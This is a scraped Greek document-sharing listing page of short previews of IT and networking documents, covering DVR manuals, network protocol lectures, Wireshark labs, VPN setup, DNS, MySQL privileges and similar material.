ΟΔΗΓΙΕΣ ΧΡΗΣΗΣ DVR TVT ΟΔΗΓΙΕΣ ΧΡΗΣΗΣ DVR TVT ΕΙΣΟΔΟΣ ΣΤΟ ΜΕΝΟΥ Στην πρώτη εκκίνηση του καταγραφικού πατάμε ΕΞΟΔΟΣ στο παράθυρο με τον «ΟΔΗΓΟ ΕΚΚΙΝΗΣΗΣ» 1) Κάνουμε δεξί κλικ και εμφανίζεται στο κάτω μέρος της οθόνης η μπάρα

Διαβάστε περισσότερα

Πρωτόκολλα Επικοινωνίας και Τείχος Προστασίας

Πρωτόκολλα Επικοινωνίας και Τείχος Προστασίας Β5.1.2 Πρωτόκολλα Επικοινωνίας και Τείχος Προστασίας Τι θα μάθουμε σήμερα: Να ορίζουμε τι είναι πρωτόκολλο επικοινωνίας Να εξηγούμε τη χρησιμότητα των πρωτοκόλλων επικοινωνίας Να ονομάζουμε τα σημαντικότερα

Διαβάστε περισσότερα

Εργαστήριο Wireshark: DNS

Εργαστήριο Wireshark: DNS Εργαστήριο Wireshark: DNS Έκδοση:2.0 2007 J.F. Kurose, K.W. Ross Μετάφραση - Απόδοση: Σ. Τσακιρίδου Computer Networking: A Top-Down Approach Featuring the Internet Όπως περιγράφεται στην Ενότητα 2.5 του

Διαβάστε περισσότερα

ΠΡΟΑΙΡΕΤΙΚΑ ΣΕΜΙΝΑΡΙΑ 2012-2013. Πληροφορική και Επιστήμη Ηλεκτρονικών Υπολογιστών

ΠΡΟΑΙΡΕΤΙΚΑ ΣΕΜΙΝΑΡΙΑ 2012-2013. Πληροφορική και Επιστήμη Ηλεκτρονικών Υπολογιστών ΠΡΟΑΙΡΕΤΙΚΑ ΣΕΜΙΝΑΡΙΑ 2012-2013 Πληροφορική και Επιστήμη Ηλεκτρονικών Υπολογιστών Εγκατάσταση Linux Server/Samba/Web Server (Apache)/MySQL Database Server/Joomla/Moodle/Word Press (Blog)/Email Server/File

Διαβάστε περισσότερα

Αν παρ όλα αυτά αντιμετωπίζετε πρόβλημα, επικοινωνήστε με το Κέντρο Δικτύου της ΑΣΠΑΙΤΕ Τηλ 210 2896709, 210 2896722, 210 2896721, noc@aspete.

Αν παρ όλα αυτά αντιμετωπίζετε πρόβλημα, επικοινωνήστε με το Κέντρο Δικτύου της ΑΣΠΑΙΤΕ Τηλ 210 2896709, 210 2896722, 210 2896721, noc@aspete. H υπηρεσία VPN προσφέρει τη δυνατότητα σε χρήστες της ΑΣΠΑΙΤΕ που συνδέονται στο Internet από άλλους φορείς (πχ ISP, άλλα ιδρύματα, κτλ) να αποκτούν ασφαλή πρόσβαση στο δίκτυο και στις υπηρεσίες της Σχολής.

Διαβάστε περισσότερα

ΘΕΜΑ ΠΤΥΧΙΑΚΗΣ : ΜΗΧΑΝΙΣΜΟΙ ΣΥΛΛΟΓΗΣ ΣΤΟΙΧΕΙΩΝ ΣΤΟ ΔΙΑΔΥΚΤΙΟ (COOKIES)

ΘΕΜΑ ΠΤΥΧΙΑΚΗΣ : ΜΗΧΑΝΙΣΜΟΙ ΣΥΛΛΟΓΗΣ ΣΤΟΙΧΕΙΩΝ ΣΤΟ ΔΙΑΔΥΚΤΙΟ (COOKIES) ΘΕΜΑ ΠΤΥΧΙΑΚΗΣ : ΜΗΧΑΝΙΣΜΟΙ ΣΥΛΛΟΓΗΣ ΣΤΟΙΧΕΙΩΝ ΣΤΟ ΔΙΑΔΥΚΤΙΟ (COOKIES) ΣΕΡΕΣΙΩΤΗ ΜΑΡΙΑ ΕΞΑΜΗΝΟ : ΠΤΥΧΙΟ Α.Μ 1999 ΥΠΕΥΘΥΝΟΣ ΚΑΘΗΓΗΤΗΣ κος ΛΕΩΝΙΔΑΣ ΤΣΙΑΝΤΗΣ ΔΩΡΟ -ΕΚΠΛΗΞΗ COOKIES ΤΙ ΕΙΝΑΙ ΤΑ COOKIES ΕΙΝΑΙ

Διαβάστε περισσότερα

Ιόνιο Πανεπιστήμιο Τμήμα Πληροφορικής Εισαγωγή στην Επιστήμη των Υπολογιστών 2014-15. Δίκτυα υπολογιστών. (και το Διαδίκτυο)

Ιόνιο Πανεπιστήμιο Τμήμα Πληροφορικής Εισαγωγή στην Επιστήμη των Υπολογιστών 2014-15. Δίκτυα υπολογιστών. (και το Διαδίκτυο) Ιόνιο Πανεπιστήμιο Τμήμα Πληροφορικής Εισαγωγή στην Επιστήμη των Υπολογιστών 2014-15 Δίκτυα υπολογιστών (και το Διαδίκτυο) http://di.ionio.gr/~mistral/tp/csintro/ Μ.Στεφανιδάκης Τι είναι ένα δίκτυο υπολογιστών;

Διαβάστε περισσότερα

ίκτυα - Internet Υπηρεσίες Internet O Παγκόσµιος Ιστός (World Wide Web) Ηλεκτρονική Αλληλογραφία (E-mail) Υπηρεσία FTP (File Transfer Protocol)

ίκτυα - Internet Υπηρεσίες Internet O Παγκόσµιος Ιστός (World Wide Web) Ηλεκτρονική Αλληλογραφία (E-mail) Υπηρεσία FTP (File Transfer Protocol) Ιόνιο Πανεπιστήµιο Τµήµα Αρχειονοµίας-Βιβλιοθηκονοµίας Κέρκυρα ίκτυα - Internet 2 Υπηρεσίες Internet O Παγκόσµιος Ιστός (World Wide Web) ΜηχανέςΑναζήτησηςστοWeb Ηλεκτρονική Αλληλογραφία (E-mail) Υπηρεσία

Διαβάστε περισσότερα

Κέντρο υποστήριξης HP. Εισαγωγή. Τι χρειάζεται να γνωρίζετε. Λήψη και εγκατάσταση της λύσης Vista στα Windows 8. 1 of 5 1/7/2014 2:09 μμ

Κέντρο υποστήριξης HP. Εισαγωγή. Τι χρειάζεται να γνωρίζετε. Λήψη και εγκατάσταση της λύσης Vista στα Windows 8. 1 of 5 1/7/2014 2:09 μμ http://h2056wwwhp.com/portal/site/hpsc/template.page/public/psi... 1 of 5 1/7/2014 2:09 μμ Για το σπίτι Για την επιχείρηση Υποστήριξη Είσοδος Εγγραφή Βοήθεια ιστότοπου HP Color LaserJet 3600 Printer series

Διαβάστε περισσότερα

Βασική εγκατάσταση Asterisk σε Linux

Βασική εγκατάσταση Asterisk σε Linux Βασική εγκατάσταση Asterisk σε Linux 1 Πι νακας περιεχομε νων ΓΕΝΙΚΆ... 3 ΕΓΚΑΤΆΣΤΑΣΗ ΛΟΓΙΣΜΙΚΟΎ... 4 LINUX MYSQL ASTERISK - UTILITIES... 4 ACCS (ALTEC CALL CENTER SERVER)... 5 Εγκατάσταση σε περιβάλλον

Διαβάστε περισσότερα

Τι είναι ένα δίκτυο υπολογιστών; Αρχιτεκτονική επιπέδων πρωτοκόλλων. Δικτυακά πρωτόκολλα

Τι είναι ένα δίκτυο υπολογιστών; Αρχιτεκτονική επιπέδων πρωτοκόλλων. Δικτυακά πρωτόκολλα Ιόνιο Πανεπιστήμιο Τμήμα Πληροφορικής Εισαγωγή στην Επιστήμη των Υπολογιστών 2014-15 Δίκτυα υπολογιστών (και το Διαδίκτυο) http://di.ionio.gr/~mistral/tp/csintro/ Μ.Στεφανιδάκης Τι είναι ένα δίκτυο υπολογιστών;

Διαβάστε περισσότερα

ΕΓΚΑΤΑΣΤΑΣΗ ΣΥΝ ΕΣΗΣ DIAL-UP ΣΕ ΛΕΙΤΟΥΡΓΙΚΟ ΣΥΣΤΗΜΑ WINDOWS XP

ΕΓΚΑΤΑΣΤΑΣΗ ΣΥΝ ΕΣΗΣ DIAL-UP ΣΕ ΛΕΙΤΟΥΡΓΙΚΟ ΣΥΣΤΗΜΑ WINDOWS XP ΕΓΚΑΤΑΣΤΑΣΗ ΣΥΝ ΕΣΗΣ DIAL-UP ΣΕ ΛΕΙΤΟΥΡΓΙΚΟ ΣΥΣΤΗΜΑ WINDOWS XP ιαδικασία δικτύωσης PC µέσω modem Στις επόµενες παραγράφους περιγράφεται αναλυτικά η διαδικασία που χρειάζεται να ακολουθήσετε προκειµένου

Διαβάστε περισσότερα

ΔΗΜΙΟΥΡΓΙΑ ΚΑΙ ΑΝΑΖΗΤΗΣΗ ΛΟΓΑΡΙΑΣΜΟΥ ΧΡΗΣΤΗ

ΔΗΜΙΟΥΡΓΙΑ ΚΑΙ ΑΝΑΖΗΤΗΣΗ ΛΟΓΑΡΙΑΣΜΟΥ ΧΡΗΣΤΗ ΔΗΜΙΟΥΡΓΙΑ ΚΑΙ ΑΝΑΖΗΤΗΣΗ ΛΟΓΑΡΙΑΣΜΟΥ ΧΡΗΣΤΗ Στόχοι Μετά την ολοκλήρωση της άσκησης θα είσαι σε θέση: 1. Να δημιουργείς ένα λογαριασμό, με τον οποίο θα συνδέεται ένας χρήστης στο domain. 2. Να αναζητάς

Διαβάστε περισσότερα

Εργαστήριο Ethereal: IP

Εργαστήριο Ethereal: IP Εργαστήριο Ethereal: IP Έκδοση:1.0 2005 J.F. Kurose, K.W. Ross Μετάφραση - Απόδοση: Σ. Τσακιρίδου Computer Networking: A Top-Down Approach Featuring the Internet Στο εργαστήριο αυτό θα εξετάσουµε το πρωτόκολλο

Διαβάστε περισσότερα

Οδηγός Εγκατάστασης και Χρήσης του Arebas Easy

Οδηγός Εγκατάστασης και Χρήσης του Arebas Easy Σ ε λ ί δ α 1 Οδηγός Εγκατάστασης και Χρήσης του Arebas Easy Περιεχόμενα 1. Download Arebas Easy... 2 2. Εγκατάσταση Arebas Easy... 3 3. Εγγραφή στον Arebas Server... 7 4. Παραμετροποίηση Arebas Easy...

Διαβάστε περισσότερα

Μια καλή επιλογή θα ήταν www.epipla-onomasas.gr (χωρίζοντας τις λέξεις με παύλα -) ή

Μια καλή επιλογή θα ήταν www.epipla-onomasas.gr (χωρίζοντας τις λέξεις με παύλα -) ή Τι είναι ένα CMS CMS ή Σύστημα Διαχείρισης Περιεχομένου (Content Management System) ονομάζουμε ένα λογισμικό που μας βοηθά να ελέγχουμε και να διαχειριζόμαστε έναν ιστότοπο δημόσιας ή περιορισμένης πρόσβασης.

Διαβάστε περισσότερα

Διαμόρφωση και έλεγχος του δικτύου

Διαμόρφωση και έλεγχος του δικτύου Εργαστήριο 8 ΤΕΙ ΘΕΣΣΑΛΟΝΙΚΗΣ - ΤΜΗΜΑ ΠΛΗΡΟΦΟΡΙΚΗΣ ΜΑΘΗΜΑ: ΔΙΚΤΥΑ Η/Υ Διαμόρφωση και έλεγχος του δικτύου Στόχος Ο στόχος αυτού του εργαστηρίου είναι η κατανόηση και εξοικείωση με τα εργαλεία διαμόρφωσης

Διαβάστε περισσότερα

Εγχειρίδιο χρήσης συστήματος ηλεκτρονικής αλληλογραφίας της Ελληνικής Ομοσπονδίας Μπριτζ

Εγχειρίδιο χρήσης συστήματος ηλεκτρονικής αλληλογραφίας της Ελληνικής Ομοσπονδίας Μπριτζ Εγχειρίδιο χρήσης συστήματος ηλεκτρονικής αλληλογραφίας της Ελληνικής Ομοσπονδίας Μπριτζ Ελληνική Ομοσπονδία Μπριτζ Σελίδα 1 / 8 Πίνακας περιεχομένων 1. Γενικά...3 2. Ρυθμίσεις για προχωρημένους...3 α.

Διαβάστε περισσότερα

Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες)

Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες) Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες) 2015 Εντολή: ping Απλή και βασική εντολή ελέγχου σύνδεσης με καποια IP διευθυνση (πχ. υπολογιστή) ping Στέλνει επαναλαμβανόμενα μηνύματα στην IP

Διαβάστε περισσότερα

Τεχνολογίες ιαδικτύου

Τεχνολογίες ιαδικτύου Τεχνολογίες ιαδικτύου Εισαγωγή Αρχιτεκτονική, Πρωτόκολλα και Πρότυπα Βασικών Υπηρεσιών Ιστορικά Στοιχεία ARPANET Ο «παππούς» των δικτύων Αναπτύχθηκε από την DARPA στα τέλη του 60 Το 83 διασπάται σε MILNET

Διαβάστε περισσότερα

Εγχειρίδιο εγκατάστασης Megasoft 2009

Εγχειρίδιο εγκατάστασης Megasoft 2009 Εγχειρίδιο εγκατάστασης Megasoft 2009 Περιεχόμενα Εγκατάσταση Joomla, JoomFish και VirtueMart... 3 Αποστολή αρχείων Joomla στο Διακομιστή (Host)... 3 Εγκατάσταση Joomla... 4 Εγκατάσταση VirtueMart... 9

Διαβάστε περισσότερα

Απομακρυσμένη Πρόσβαση και Εντολές Ελέγχου και Υποστήριξης

Απομακρυσμένη Πρόσβαση και Εντολές Ελέγχου και Υποστήριξης Εργαστήριο 10 ΤΕΙ ΘΕΣΣΑΛΟΝΙΚΗΣ - ΤΜΗΜΑ ΠΛΗΡΟΦΟΡΙΚΗΣ ΜΑΘΗΜΑ: ΔΙΚΤΥΑ Η/Υ Απομακρυσμένη Πρόσβαση και Εντολές Ελέγχου και Υποστήριξης Στόχος Ο στόχος του παρόντος εργαστηρίου είναι διττός: από τη μία πλευρά

Διαβάστε περισσότερα

ΕΡΓΑΣΤΗΡΙΟ FRONT PAGE 3

ΕΡΓΑΣΤΗΡΙΟ FRONT PAGE 3 ΕΡΓΑΣΤΗΡΙΟ FRONT PAGE 3 Φόρµες Ένας τρόπος για να συλλέξετε πληροφορία από τους επισκέπτες του δικτυακού σας τόπου είναι οι φόρµες. Με τα εξειδικευµένα αυτά εργαλεία µπορείτε να κάνετε έρευνες ή τεστ,

Διαβάστε περισσότερα

Πρόβλεμα Online Gaming με modem Thomson και Speedtouch

Πρόβλεμα Online Gaming με modem Thomson και Speedtouch Πρόβλεμα Online Gaming με modem Thomson και Speedtouch Περιγραθή προβλήμαηος Εάλ πξνζπαζείηε λα παίμεηε online παηρλίδηα αιιά εκθαλίδεηαη error ζηνλ Wii ζαο γηα NAT/DMZ/Port forwarding δνθηκάζηε απηή ηελ

Διαβάστε περισσότερα

ΕΠΛ 001: ΕΙΣΑΓΩΓΗ ΣΤΗΝ ΕΠΙΣΤΗΜΗ ΤΗΣ ΠΛΗΡΟΦΟΡΙΚΗΣ. Δίκτυα Υπολογιστών

ΕΠΛ 001: ΕΙΣΑΓΩΓΗ ΣΤΗΝ ΕΠΙΣΤΗΜΗ ΤΗΣ ΠΛΗΡΟΦΟΡΙΚΗΣ. Δίκτυα Υπολογιστών ΕΠΛ 001: ΕΙΣΑΓΩΓΗ ΣΤΗΝ ΕΠΙΣΤΗΜΗ ΤΗΣ ΠΛΗΡΟΦΟΡΙΚΗΣ Δίκτυα Υπολογιστών Στόχοι 1 Να εξηγήσουμε τι είναι τα δίκτυα υπολογιστών, ποιες είναι οι βασικές κατηγορίες τους και ποιες οι πιο συνηθισμένες τοπολογίες

Διαβάστε περισσότερα

Στόχοι. Υπολογιστικά συστήματα: Στρώματα. Βασικές έννοιες [7]

Στόχοι. Υπολογιστικά συστήματα: Στρώματα. Βασικές έννοιες [7] Στόχοι ΕΠΛ 003: ΕΙΣΑΓΩΓΗ ΣΤΗΝ ΕΠΙΣΤΗΜΗ ΤΗΣ ΠΛΗΡΟΦΟΡΙΚΗΣ 1 Να εξηγήσουμε τι είναι τα δίκτυα υπολογιστών, ποιες είναι οι βασικές κατηγορίες τους και ποιες οι πιο συνηθισμένες τοπολογίες τους. Να περιγράψουμε

Διαβάστε περισσότερα

Πανεπιστήμιο Κρήτης, Τμήμα Επιστήμης Υπολογιστών ΗΥ463 Συστήματα Ανάκτησης Πληροφοριών 2009-2010 Χειμερινό Εξάμηνο

Πανεπιστήμιο Κρήτης, Τμήμα Επιστήμης Υπολογιστών ΗΥ463 Συστήματα Ανάκτησης Πληροφοριών 2009-2010 Χειμερινό Εξάμηνο Πανεπιστήμιο Κρήτης, Τμήμα Επιστήμης Υπολογιστών ΗΥ463 Συστήματα Ανάκτησης Πληροφοριών 2009-2010 Χειμερινό Εξάμηνο 2 η Σειρά Ασκήσεων Αξία: 5% του τελικού σας βαθμού Bzr (Bazaar) Το Bazaar (ή bzr) είναι

Διαβάστε περισσότερα

Κεφάλαιο 3. Ανάλυση Honeynet δεδομένων

Κεφάλαιο 3. Ανάλυση Honeynet δεδομένων Ανάλυση Honeynet δεδομένων - Σελίδα 36 - Στο κεφάλαιο 2 είδαμε πως με το honeynet μπορούμε να συλλέξουμε πληροφορίες σχετικά με όλη την δικτυακή κίνηση από και προς αυτό. Για να βγουν κάποια χρήσιμα συμπεράσματα

Διαβάστε περισσότερα

ΒΟΗΘΕΙΑ ΓΙΑ ΤΟ ΗΛΕΚΤΡΟΝΙΚΟ ΤΑΧΥΔΡΟΜΕΙΟ (E-MAIL)

ΒΟΗΘΕΙΑ ΓΙΑ ΤΟ ΗΛΕΚΤΡΟΝΙΚΟ ΤΑΧΥΔΡΟΜΕΙΟ (E-MAIL) Ορφανίδου 67 & Κονδυλάκη, Πατήσια Tηλ. Κέντρο: 210-22.23.799 Fax: 210-21.39.576 Ε-mail: iservices@omac.gr Web Site: http://www.omac.gr ΒΟΗΘΕΙΑ ΓΙΑ ΤΟ ΗΛΕΚΤΡΟΝΙΚΟ ΤΑΧΥΔΡΟΜΕΙΟ (E-MAIL) ΘΕΜΑ: ΡΥΘΜΙΣΕΙΣ ΝΕΟΥ

Διαβάστε περισσότερα

7.2.2 Σχέση OSI και TCP/IP

7.2.2 Σχέση OSI και TCP/IP Κεφάλαιο 7 7.2.2 Σχέση OSI και TCP/IP Σελ. 226-230 Γεώργιος Γιαννόπουλος ΠΕ19, ggiannop (at) sch.gr ΕΣΠΕΡΙΝΟ ΕΠΑΛ Κομοτηνής http://diktya-epal-g.ggia.info/ Γνωστό μοντέλο OSI διασύνδεσης ανοικτών συστημάτων.

Διαβάστε περισσότερα

PRISMA Win POS Sync Merge Replication

PRISMA Win POS Sync Merge Replication ΤΜΗΜΑ ΥΠΟΣΤΗΡΙΞΗΣ Οδηγός Ρυθμίσεων Συγχρονισμού PRISMA Win POS Sync Merge Replication Η διαδικασία του συγχρονισμού γίνεται από τον Η/Υ που έχει το Back Office. Βασική προϋπόθεση για να ενεργοποιηθεί ο

Διαβάστε περισσότερα

Academia Financials Γενική Λογιστική ΠΕΡΙΕΧΟΜΕΝΑ

Academia Financials Γενική Λογιστική ΠΕΡΙΕΧΟΜΕΝΑ 05010103/03/12 ΠΕΡΙΕΧΟΜΕΝΑ ΠΕΡΙΕΧΟΜΕΝΑ Α. ΕΓΚΑΤΑΣΤΑΣΗ... 1 1. ΤΕΧΝΙΚΕΣ ΠΡΟΔΙΑΓΡΑΦΕΣ ΕΓΚΑΤΑΣΤΑΣΗΣ... 1 1.1. ΠΕΡΙΓΡΑΦΗ ΕΦΑΡΜΟΓΩΝ ΤΗΣ DATA COMMUNICATION... 1 1.2. ΧΑΡΑΚΤΗΡΙΣΤΙΚΑ ΕΦΑΡΜΟΓΗΣ... 1 1.3. ΤΟΠΟΛΟΓΙΕΣ

Διαβάστε περισσότερα

ΤΕΙ ΚΑΒΑΛΑΣ. Πτυχιακή εργασία ΕΙΣΑΓΩΓΗ. Μιλτιάδης Κακλαμάνης

ΤΕΙ ΚΑΒΑΛΑΣ. Πτυχιακή εργασία ΕΙΣΑΓΩΓΗ. Μιλτιάδης Κακλαμάνης Σελίδα 1από ΤΕΙ ΚΑΒΑΛΑΣ Πτυχιακή εργασία Δικτυακή Εφαρμογή διαχείρισης ηλεκτρονικών εγγράφων υπηρεσίας. ΕΙΣΑΓΩΓΗ Μιλτιάδης Κακλαμάνης Σελίδα 2από Κατάλογος περιεχομένων ΕΙΣΑΓΩΓΗ...1 Σχετιζόμενα πρόσωπα...3

Διαβάστε περισσότερα

Εισαγωγή στο DNS lookup

Εισαγωγή στο DNS lookup Εισαγωγή στο DNS lookup DNS lookup made easy by finrod για την Κοινότητα Ελεύθερου Λογισμικού ΕΜΠ(2011) Εισαγωγικά... IP lookup Μετάφραση (resolution) μίας FQDN διεύθυνσης (Fully Qualified Domain Name)

Διαβάστε περισσότερα

ΔΗΜΙΟΥΡΓΙΑ ΕΝΟΣ DOMAIN CONTROLLER

ΔΗΜΙΟΥΡΓΙΑ ΕΝΟΣ DOMAIN CONTROLLER ΔΗΜΙΟΥΡΓΙΑ ΕΝΟΣ DOMAIN CONTROLLER Στόχοι Μετά την ολοκλήρωση της άσκησης θα είσαι σε θέση: 1. Να δημιουργείς έναν domain controller, σε έναν υπολογιστή με λειτουργικό σύστημα Windows Server 2003. 2. Να

Διαβάστε περισσότερα

Εργαστήριο Βάσεων Δεδομένων

Εργαστήριο Βάσεων Δεδομένων Εργαστήριο Βάσεων Δεδομένων Φροντιστήριο 4/2/2009 Δικαιώματα χρηστών - Προβολές (Views) ΕΠΙΚΟΙΝΩΝΙΑ ΜΕ MYSQL queries results mysql host DB server queries results Client host Β Δ Ηχρήσητηςmysql βασίζεται

Διαβάστε περισσότερα

RMCLab. Remote Monitored and Controlled Laboratory

RMCLab. Remote Monitored and Controlled Laboratory RMCLab Remote Monitored and Controlled Laboratory Help with Microsoft Windows XP and Norton Internet Security Firewalls Ακολούθως δίνονται αναλυτικές οδηγίες για την σωστή διαχείριση του Firewall των Windows

Διαβάστε περισσότερα

Πρωτόκολλα Επικοινωνίας Πρωτόκολλο IP

Πρωτόκολλα Επικοινωνίας Πρωτόκολλο IP Πρωτόκολλα Επικοινωνίας Πρωτόκολλο IP Πρωτόκολλα επικοινωνίας Ορισμός Σύνολα προσυμφωνημένων κανόνων που απαιτούνται για τον καθορισμό του τρόπου με τον οποίο επιτυγχάνεται η ανταλλαγή δεδομένων, και επομένως

Διαβάστε περισσότερα

ΤΕΧΝΟΛΟΓΙΑ ΙΚΤΥΩΝ ΕΠΙΚΟΙΝΩΝΙΩΝ

ΤΕΧΝΟΛΟΓΙΑ ΙΚΤΥΩΝ ΕΠΙΚΟΙΝΩΝΙΩΝ Ηυιοθέτησητης τεχνολογίαςκαι αρχιτεκτονικής TCP/IP δεν έρχεται σε σύγκρουσηµε το µοντέλο του OSI και αυτό γιατί και τα δυο συστήµατααναπτύχθηκαν συγχρόνως. Παρόλα αυτά, υπάρχουν ορισµένες ουσιώδεις διαφορές

Διαβάστε περισσότερα

ΚΕΠΛΗΝΕΤ ΕΒΡΟΥ. Καλτσίδης Χρήστος

ΚΕΠΛΗΝΕΤ ΕΒΡΟΥ. Καλτσίδης Χρήστος Καλτσίδης Χρήστος Μάρτιος 2009 Υπηρεσία Φιλοξενίας Ιστοσελίδων στο ΠΣΔ Η υπηρεσία φιλοξενίας σελίδων στο Πανελλήνιο Σχολικό Δίκτυο έχει σκοπό την προβολή των δραστηριοτήτων των σχολικών μονάδων και του

Διαβάστε περισσότερα

Πλατφόρμα Ασύγχρονης Τηλεκπαίδευσης eclass 1.7. Οδηγίες Αναβάθμισης (Upgrade) - 1 - Αθήνα, 16 Μαρτίου 2007. 1. Εισαγωγή

Πλατφόρμα Ασύγχρονης Τηλεκπαίδευσης eclass 1.7. Οδηγίες Αναβάθμισης (Upgrade) - 1 - Αθήνα, 16 Μαρτίου 2007. 1. Εισαγωγή Πλατφόρμα Ασύγχρονης Τηλεκπαίδευσης eclass 1.7 Οδηγίες Αναβάθμισης (Upgrade) Ομάδα Εργασίας: Τσιμπάνης Κωνσταντίνος, Εξηνταρίδης Γιάννης Αθήνα, 16 Μαρτίου 2007 1. Εισαγωγή Η πλατφόρμα eclass είναι ένα

Διαβάστε περισσότερα

ΠΡΟΑΙΡΕΤΙΚΑ ΣΕΜΙΝΑΡΙΑ 2012-2013. Πληροφορική και Επιστήμη Ηλεκτρονικών Υπολογιστών

ΠΡΟΑΙΡΕΤΙΚΑ ΣΕΜΙΝΑΡΙΑ 2012-2013. Πληροφορική και Επιστήμη Ηλεκτρονικών Υπολογιστών ΠΡΟΑΙΡΕΤΙΚΑ ΣΕΜΙΝΑΡΙΑ 0-03 Πληροφορική και Επιστήμη Ηλεκτρονικών Υπολογιστών Εγκατάσταση Linux Server/Samba/Web Server (Apache)/MySQL Database Server/Joomla/Moodle/Word Press (Blog)/Email Server/File Server/Advanced

Διαβάστε περισσότερα

Εγχειρίδιο Χρήστη ECAS

Εγχειρίδιο Χρήστη ECAS ΕΥΡΩΠΑΪΚΗ ΕΠΙΤΡΟΠΗ Γενική Διεύθυνση Παιδείας και Πολιτισμού Δια Βιου Μάθηση: Πολιτικές και Πρόγραμμα Συντονισμός του Προγράμματος για τη Δια Βίου Μάθηση Εγχειρίδιο Χρήστη ECAS Το Σύστημα Διαπίστευσης της

Διαβάστε περισσότερα

Εγκατάσταση της έκδοσης 5.30

Εγκατάσταση της έκδοσης 5.30 Μελίσσια, 23 Φεβρουαρίου 2010 Εγκατάσταση της έκδοσης 5.30 Περιεχόμενα Φακέλου Ο φάκελος που παραλάβατε περιέχει 1 CD και τις οδηγίες που διαβάζετε. Αντίγραφα Ασφαλείας Λόγω των μετασχηματισμών που θα

Διαβάστε περισσότερα

To λεξικό του Internet

To λεξικό του Internet To λεξικό του Internet A Address: Ο τόπος που βρίσκεται μια πηγή του Internet. Μια e-mail address μπορεί να έχει την εξής μορφή : georgepapado@hotmail.com. Μια web address είναι κάπως έτσι: http://www.in.gr.

Διαβάστε περισσότερα

Χρήσιμες Ρυθμίσεις του Windows 7 στον Η/Υ σας

Χρήσιμες Ρυθμίσεις του Windows 7 στον Η/Υ σας Χρήσιμες Ρυθμίσεις του Windows 7 στον Η/Υ σας Πώς να δημιουργήσουμε ένα νέο λογαριασμό χρήστη (User Account) στα Windows 7 Αρκετές φορές τυχαίνει να χρησιμοποιούν διάφορα άτομα τον Η/Υ σας. Σε τέτοιες

Διαβάστε περισσότερα

Εργαστήριο Βάσεων Δεδομένων. Δικαιώματα Χρηστών Προβολές

Εργαστήριο Βάσεων Δεδομένων. Δικαιώματα Χρηστών Προβολές Εργαστήριο Βάσεων Δεδομένων Δικαιώματα Χρηστών Προβολές Επικοινωνία με MySQL mysql host DB server queries results Client host Β Δ Η χρήση της mysql βασίζεται στο μοντέλο client server Remote access to

Διαβάστε περισσότερα

Ως Διαδίκτυο (Internet) ορίζεται το παγκόσμιο (διεθνές) δίκτυο ηλεκτρονικών υπολογιστών (international network).

Ως Διαδίκτυο (Internet) ορίζεται το παγκόσμιο (διεθνές) δίκτυο ηλεκτρονικών υπολογιστών (international network). ΙΔΡΥΜΑ ΝΕΟΛΑΙΑΣ ΚΑΙ ΔΙΑ ΒΙΟΥ ΜΑΘΗΣΗΣ ΥΠΗΡΕΣΙΕΣ ΔΙΑΔΙΚΤΥΟΥ Καλαμάτα, 2015 Το Διαδίκτυο Ως Διαδίκτυο (Internet) ορίζεται το παγκόσμιο (διεθνές) δίκτυο ηλεκτρονικών υπολογιστών (international network). Πρόκειται

Διαβάστε περισσότερα